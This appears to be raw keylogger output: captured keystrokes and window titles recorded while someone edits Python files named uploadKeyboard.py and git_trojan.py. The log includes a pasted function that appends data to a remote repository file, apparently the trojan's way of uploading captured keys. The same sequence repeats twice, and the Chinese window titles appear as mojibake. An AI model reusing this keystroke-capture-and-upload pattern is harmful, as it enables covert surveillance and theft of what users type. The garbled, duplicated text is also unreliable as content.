asdkfjkasdflasdjlfkjasdlkfjasdklfjaksdljf
[ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
a[ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
sdfghjkl;[ PID: 3944 - ? - pyworks ]
[Prior][Prior][Prior][Return][ PID: 8016 - ËÖÄ - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
ghkhjklkhjhghfgdfsasddfghjk[ PID: 4184 - firefox.exe - PythonÊñá‰ª∂Êìç‰ΩúËØªÂÜôÊñá‰ª∂ - - ITeyeÊäÄÊúØÁΩëÁ´ô - Mozilla Firefox ]
[Down][Down][Down][Down]python[Space][Lshift]wenj[Space]duqu[Space][Return][ PID: 4184 - firefox.exe - PythonËØªÂÜôÊñá‰ª∂ - AllenW - ÂçöÂÆ¢Âõ≠ - Mozilla Firefox ]
[Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][ PID: 8016 - ÈèÄ - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
[Back][Back]/[Right][Right][Right][Right][Right][Right][Right][Right][Right][Right][Left][Back][Back]/[Right][Right][Right][Right][Right][Right][Right][Right][Back][Back]/[Delete][Lshift]"[Delete][Rshift]C[Delete][Lshift]"[Left][Right][Right][Right][Lcontrol][S][ PID: 8016 - ÈèÄ - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[B][Return][ PID: 8016 - ÈèÄ - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
file[Lshift]Handel[Space]=[Space][Lshift][Lshift][Lshift]None[Lcontrol][S][ PID: 8016 - ÈèÄ - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[B][ PID: 8016 - ÈèÄ - C:\pyworks\before\git_trojan.py - Sublime Text (UNREGISTERED) ]
d[ PID: 8016 - ÈèÄ - C:\pyworks\before\git_trojan.py ? - Sublime Text (UNREGISTERED) ]
a[Back][Back][Lshift][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Lcontrol][C][Lcontrol][PASTE] - ====================[Lcontrol][C][Return][Lcontrol][PASTE] - ====================[Lcontrol][Lshift][Oem_2]ds[Back][Back][ PID: 8016 - ? - C:\pyworks\finale(9.13)\fileOperationForHacker.py - Sublime Text (UNREGISTERED) ]
[Lcontrol][C][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[Return][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
[Return][Return][Up][Up][Lcontrol][PASTE] - 
#Êõ¥Êñ∞Êñá‰ª∂Áî®
def upFile(oricon,msg,comment):
	if oricon == None : print "dont have such file\n" ;return;
	orimsg=base64.decodestring(str(oricon.content))
	oricon.update(comment,orimsg+msg)[S][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[Lcontrol][B][Down][Right][Delete][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
[Delete][Delete][Delete][Delete][Lcontrol][S][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[B][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
a[ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
sdfghjkl;[ PID: 3944 - ? - pyworks ]
[Prior][Prior][Prior][Return][ PID: 8016 - ƒ@ - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
ghkhjklkhjhghfgdfsasddfghjk[ PID: 4184 - firefox.exe - PythonŒƒº˛≤Ÿ◊˜∂¡–¥Œƒº˛ - - ITeyeºº ıÕ¯’æ - Mozilla Firefox ]
[Down][Down][Down][Down]python[Space][Lshift]wenj[Space]duqu[Space][Return][ PID: 4184 - firefox.exe - Python∂¡–¥Œƒº˛ - AllenW - ≤©øÕ‘∞ - Mozilla Firefox ]
[Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][ PID: 8016 - Êî - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
[Back][Back]/[Right][Right][Right][Right][Right][Right][Right][Right][Right][Right][Left][Back][Back]/[Right][Right][Right][Right][Right][Right][Right][Right][Back][Back]/[Delete][Lshift]"[Delete][Rshift]C[Delete][Lshift]"[Left][Right][Right][Right][Lcontrol][S][ PID: 8016 - Êî - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[B][Return][ PID: 8016 - Êî - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
file[Lshift]Handel[Space]=[Space][Lshift][Lshift][Lshift]None[Lcontrol][S][ PID: 8016 - Êî - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[B][ PID: 8016 - Êî - C:\pyworks\before\git_trojan.py - Sublime Text (UNREGISTERED) ]
d[ PID: 8016 - Êî - C:\pyworks\before\git_trojan.py ? - Sublime Text (UNREGISTERED) ]
a[Back][Back][Lshift][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Down][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Next][Lcontrol][C][Lcontrol][PASTE] - ====================[Lcontrol][C][Return][Lcontrol][PASTE] - ====================[Lcontrol][Lshift][Oem_2]ds[Back][Back][ PID: 8016 - ? - C:\pyworks\finale(9.13)\fileOperationForHacker.py - Sublime Text (UNREGISTERED) ]
[Lcontrol][C][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[Return][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
[Return][Return][Up][Up][Lcontrol][PASTE] - 
#∏¸–¬Œƒº˛”√
def upFile(oricon,msg,comment):
	if oricon == None : print "dont have such file\n" ;return;
	orimsg=base64.decodestring(str(oricon.content))
	oricon.update(comment,orimsg+msg)[S][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[Lcontrol][B][Down][Right][Delete][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py ? - Sublime Text (UNREGISTERED) ]
[Delete][Delete][Delete][Delete][Lcontrol][S][ PID: 8016 - ? - C:\pyworks\finale(9.13)\uploadKeyboard.py - Sublime Text (UNREGISTERED) ]
[B]